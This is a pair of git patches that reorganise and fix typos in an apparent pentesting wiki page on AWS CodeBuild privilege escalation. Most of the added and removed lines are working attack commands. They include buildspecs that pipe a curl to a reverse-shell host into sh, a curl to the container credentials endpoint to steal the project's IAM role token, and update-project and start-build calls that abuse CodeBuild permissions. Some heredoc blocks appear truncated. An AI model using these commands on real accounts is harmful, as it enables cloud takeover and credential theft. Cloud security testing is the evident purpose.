From f9673cc3b53b5945658b45eda5451b29e9e5072b Mon Sep 17 00:00:00 2001 From: root Date: Wed, 16 Oct 2024 14:55:19 +0200 Subject: [PATCH 1/2] Privisc page updated to improve understanding. --- .../aws-codebuild-privesc.md | 139 ++++++++++-------- 1 file changed, 79 insertions(+), 60 deletions(-) diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.md index 2c2c568596..07d00c5562 100644 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.md +++ b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.md @@ -23,10 +23,69 @@ Get more info in: [aws-codebuild-enum.md](../aws-services/aws-codebuild-enum.md) {% endcontent-ref %} +### `codebuild:StartBuild` | `codebuild:StartBuildBatch` + +Only with one of these permissions it's enough to trigger a build with a new buildspec and steal the token of the iam role assigned to the project: + +{% tabs %} +{% tab title="StartBuild" %} +{% code overflow="wrap" %} +```bash +cat > /tmp/buildspec.yml < --buildspec-override file:///tmp/buildspec.yml +``` +{% endcode %} +{% endtab %} + +{% tab title="StartBuildBatch" %} +{% code overflow="wrap" %} +```bash +cat > hacktricks.yml < --buildspec-override file:///tmp/buildspec.yml +``` +{% endcode %} +{% endtab %} +{% endtabs %} + +**Note**: The difference between these two commands is that: +- `StartBuild` triggers a single build job using a specific `buildspec.yml`. +- `StartBuildBatch` allows you to start a batch of builds, with more complex configurations (like running multiple builds in parallel). + +**Potential Impact:** Direct privesc to attached AWS Codebuild roles. + ### `iam:PassRole`, `codebuild:CreateProject`, (`codebuild:StartBuild` | `codebuild:StartBuildBatch`) An attacker with the **`iam:PassRole`, `codebuild:CreateProject`, and `codebuild:StartBuild` or `codebuild:StartBuildBatch`** permissions would be able to **escalate privileges to any codebuild IAM role** by creating a running one. + {% tabs %} {% tab title="Example1" %} ```bash @@ -149,66 +208,27 @@ aws codebuild start-build --project-name codebuild-demo-project **Potential Impact:** Direct privesc to any AWS Codebuild role. -### `codebuild:StartBuild` | `codebuild:StartBuildBatch` - -Only with one of these permissions it's enough to trigger a build with a new buildspec and steal the token of the iam role assigned to the project: - -{% tabs %} -{% tab title="StartBuild" %} -{% code overflow="wrap" %} -```bash -cat > /tmp/builspec.yml < --buildspec-override file:///tmp/builspec.yml -``` -{% endcode %} -{% endtab %} - -{% tab title="StartBuildBatch" %} -{% code overflow="wrap" %} -```bash -cat > /tmp/builspec.yml < --buildspec-override file:///tmp/builspec.yml -``` -{% endcode %} -{% endtab %} -{% endtabs %} - -**Potential Impact:** Direct privesc to attached AWS Codebuild roles. - ### `codebuild:UpdateProject`, (`codebuild:StartBuild` | `codebuild:StartBuildBatch`) Like in the previous section but **without the `iam:PassRole` permission**, you can abuse this permissions to **modify existing Codebuild projects and access the role they already have assigned**. {% tabs %} -{% tab title="StartBuildBatch" %} +{% tab title="StartBuild" %} +{% code overflow="wrap" %} ```sh REV_PATH="/tmp/codebuild_pwn.json" +# Enumerate then env and get creds +REV="env\\\\n - curl http://169.254.170.2\$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" + # Get rev shell REV="curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | sh" -# You need to indicate the name of the project you want to modify JSON="{ - \"name\": \"codebuild_lab_3_project\", + \"name\": \"\", \"source\": { \"type\": \"NO_SOURCE\", - \"buildspec\": \"version: 0.2\\\\n\\\\nbatch:\\\\n fast-fail: false\\\\n build-list:\\\\n - identifier: build1\\\\n env:\\\\n variables:\\\\n BUILD_ID: build1\\\\n buildspec: |\\\\n version: 0.2\\\\n env:\\\\n shell: sh\\\\n phases:\\\\n build:\\\\n commands:\\\\n - curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | sh\\\\n ignore-failure: true\\\\n\" + \"buildspec\": \"version: 0.2\\\\n\\\\nphases:\\\\n build:\\\\n commands:\\\\n - $REV\\\\n\" }, \"artifacts\": { \"type\": \"NO_ARTIFACTS\" @@ -221,32 +241,31 @@ JSON="{ } }" -printf "$JSON" > $REV_PATH - # Note how it's used a image from AWS public ECR instead from docjerhub as dockerhub rate limits CodeBuild! +printf "$JSON" > $REV_PATH + aws codebuild update-project --cli-input-json file://$REV_PATH -aws codebuild start-build-batch --project-name codebuild-demo-project +aws codebuild start-build --project-name codebuild-demo-project ``` +{% endcode %} {% endtab %} -{% tab title="StartBuild" %} +{% tab title="StartBuildBatch" %} {% code overflow="wrap" %} ```sh REV_PATH="/tmp/codebuild_pwn.json" -# Enumerate then env and get creds -REV="env\\\\n - curl http://169.254.170.2\$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" - # Get rev shell REV="curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | sh" +# You need to indicate the name of the project you want to modify JSON="{ - \"name\": \"\", + \"name\": \"codebuild_lab_3_project\", \"source\": { \"type\": \"NO_SOURCE\", - \"buildspec\": \"version: 0.2\\\\n\\\\nphases:\\\\n build:\\\\n commands:\\\\n - $REV\\\\n\" + \"buildspec\": \"version: 0.2\\\\n\\\\nbatch:\\\\n fast-fail: false\\\\n build-list:\\\\n - identifier: build1\\\\n env:\\\\n variables:\\\\n BUILD_ID: build1\\\\n buildspec: |\\\\n version: 0.2\\\\n env:\\\\n shell: sh\\\\n phases:\\\\n build:\\\\n commands:\\\\n - curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | sh\\\\n ignore-failure: true\\\\n\" }, \"artifacts\": { \"type\": \"NO_ARTIFACTS\" @@ -259,16 +278,16 @@ JSON="{ } }" -# Note how it's used a image from AWS public ECR instead from docjerhub as dockerhub rate limits CodeBuild! - printf "$JSON" > $REV_PATH +# Note how it's used a image from AWS public ECR instead from dockerhub as dockerhub rate limits CodeBuild! + aws codebuild update-project --cli-input-json file://$REV_PATH -aws codebuild start-build --project-name codebuild-demo-project +aws codebuild start-build-batch --project-name codebuild-demo-project ``` -{% endcode %} {% endtab %} +{% endcode %} {% endtabs %} **Potential Impact:** Direct privesc to attached AWS Codebuild roles. @@ -319,7 +338,7 @@ aws codebuild start-build --project-name # Wait for the reverse shell :) ``` -You can use something like this **builspec** to get a **reverse shell**: +You can use something like this **buildspec** to get a **reverse shell**: {% code title="buildspec.yml" %} ```yaml From 222f9e173a3407625c318c35e2aed24387bfda33 Mon Sep 17 00:00:00 2001 From: root Date: Wed, 16 Oct 2024 14:55:19 +0200 Subject: [PATCH 2/2] Privisc page updated to improve understanding. --- .../aws-codebuild-privesc.md | 137 ++++++++++-------- 1 file changed, 78 insertions(+), 59 deletions(-) diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.md index 2c2c568596..ed810ce783 100644 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.md +++ b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.md @@ -23,10 +23,69 @@ Get more info in: [aws-codebuild-enum.md](../aws-services/aws-codebuild-enum.md) {% endcontent-ref %} +### `codebuild:StartBuild` | `codebuild:StartBuildBatch` + +Only with one of these permissions it's enough to trigger a build with a new buildspec and steal the token of the iam role assigned to the project: + +{% tabs %} +{% tab title="StartBuild" %} +{% code overflow="wrap" %} +```bash +cat > /tmp/buildspec.yml < --buildspec-override file:///tmp/buildspec.yml +``` +{% endcode %} +{% endtab %} + +{% tab title="StartBuildBatch" %} +{% code overflow="wrap" %} +```bash +cat > hacktricks.yml < --buildspec-override file:///tmp/buildspec.yml +``` +{% endcode %} +{% endtab %} +{% endtabs %} + +**Note**: The difference between these two commands is that: +- `StartBuild` triggers a single build job using a specific `buildspec.yml`. +- `StartBuildBatch` allows you to start a batch of builds, with more complex configurations (like running multiple builds in parallel). + +**Potential Impact:** Direct privesc to attached AWS Codebuild roles. + ### `iam:PassRole`, `codebuild:CreateProject`, (`codebuild:StartBuild` | `codebuild:StartBuildBatch`) An attacker with the **`iam:PassRole`, `codebuild:CreateProject`, and `codebuild:StartBuild` or `codebuild:StartBuildBatch`** permissions would be able to **escalate privileges to any codebuild IAM role** by creating a running one. + {% tabs %} {% tab title="Example1" %} ```bash @@ -149,66 +208,27 @@ aws codebuild start-build --project-name codebuild-demo-project **Potential Impact:** Direct privesc to any AWS Codebuild role. -### `codebuild:StartBuild` | `codebuild:StartBuildBatch` - -Only with one of these permissions it's enough to trigger a build with a new buildspec and steal the token of the iam role assigned to the project: - -{% tabs %} -{% tab title="StartBuild" %} -{% code overflow="wrap" %} -```bash -cat > /tmp/builspec.yml < --buildspec-override file:///tmp/builspec.yml -``` -{% endcode %} -{% endtab %} - -{% tab title="StartBuildBatch" %} -{% code overflow="wrap" %} -```bash -cat > /tmp/builspec.yml < --buildspec-override file:///tmp/builspec.yml -``` -{% endcode %} -{% endtab %} -{% endtabs %} - -**Potential Impact:** Direct privesc to attached AWS Codebuild roles. - ### `codebuild:UpdateProject`, (`codebuild:StartBuild` | `codebuild:StartBuildBatch`) Like in the previous section but **without the `iam:PassRole` permission**, you can abuse this permissions to **modify existing Codebuild projects and access the role they already have assigned**. {% tabs %} -{% tab title="StartBuildBatch" %} +{% tab title="StartBuild" %} +{% code overflow="wrap" %} ```sh REV_PATH="/tmp/codebuild_pwn.json" +# Enumerate then env and get creds +REV="env\\\\n - curl http://169.254.170.2\$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" + # Get rev shell REV="curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | sh" -# You need to indicate the name of the project you want to modify JSON="{ - \"name\": \"codebuild_lab_3_project\", + \"name\": \"\", \"source\": { \"type\": \"NO_SOURCE\", - \"buildspec\": \"version: 0.2\\\\n\\\\nbatch:\\\\n fast-fail: false\\\\n build-list:\\\\n - identifier: build1\\\\n env:\\\\n variables:\\\\n BUILD_ID: build1\\\\n buildspec: |\\\\n version: 0.2\\\\n env:\\\\n shell: sh\\\\n phases:\\\\n build:\\\\n commands:\\\\n - curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | sh\\\\n ignore-failure: true\\\\n\" + \"buildspec\": \"version: 0.2\\\\n\\\\nphases:\\\\n build:\\\\n commands:\\\\n - $REV\\\\n\" }, \"artifacts\": { \"type\": \"NO_ARTIFACTS\" @@ -221,32 +241,31 @@ JSON="{ } }" -printf "$JSON" > $REV_PATH - # Note how it's used a image from AWS public ECR instead from docjerhub as dockerhub rate limits CodeBuild! +printf "$JSON" > $REV_PATH + aws codebuild update-project --cli-input-json file://$REV_PATH -aws codebuild start-build-batch --project-name codebuild-demo-project +aws codebuild start-build --project-name codebuild-demo-project ``` +{% endcode %} {% endtab %} -{% tab title="StartBuild" %} +{% tab title="StartBuildBatch" %} {% code overflow="wrap" %} ```sh REV_PATH="/tmp/codebuild_pwn.json" -# Enumerate then env and get creds -REV="env\\\\n - curl http://169.254.170.2\$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" - # Get rev shell REV="curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | sh" +# You need to indicate the name of the project you want to modify JSON="{ - \"name\": \"\", + \"name\": \"codebuild_lab_3_project\", \"source\": { \"type\": \"NO_SOURCE\", - \"buildspec\": \"version: 0.2\\\\n\\\\nphases:\\\\n build:\\\\n commands:\\\\n - $REV\\\\n\" + \"buildspec\": \"version: 0.2\\\\n\\\\nbatch:\\\\n fast-fail: false\\\\n build-list:\\\\n - identifier: build1\\\\n env:\\\\n variables:\\\\n BUILD_ID: build1\\\\n buildspec: |\\\\n version: 0.2\\\\n env:\\\\n shell: sh\\\\n phases:\\\\n build:\\\\n commands:\\\\n - curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | sh\\\\n ignore-failure: true\\\\n\" }, \"artifacts\": { \"type\": \"NO_ARTIFACTS\" @@ -259,13 +278,13 @@ JSON="{ } }" -# Note how it's used a image from AWS public ECR instead from docjerhub as dockerhub rate limits CodeBuild! - printf "$JSON" > $REV_PATH +# Note how it's used a image from AWS public ECR instead from dockerhub as dockerhub rate limits CodeBuild! + aws codebuild update-project --cli-input-json file://$REV_PATH -aws codebuild start-build --project-name codebuild-demo-project +aws codebuild start-build-batch --project-name codebuild-demo-project ``` {% endcode %} {% endtab %} @@ -319,7 +338,7 @@ aws codebuild start-build --project-name # Wait for the reverse shell :) ``` -You can use something like this **builspec** to get a **reverse shell**: +You can use something like this **buildspec** to get a **reverse shell**: {% code title="buildspec.yml" %} ```yaml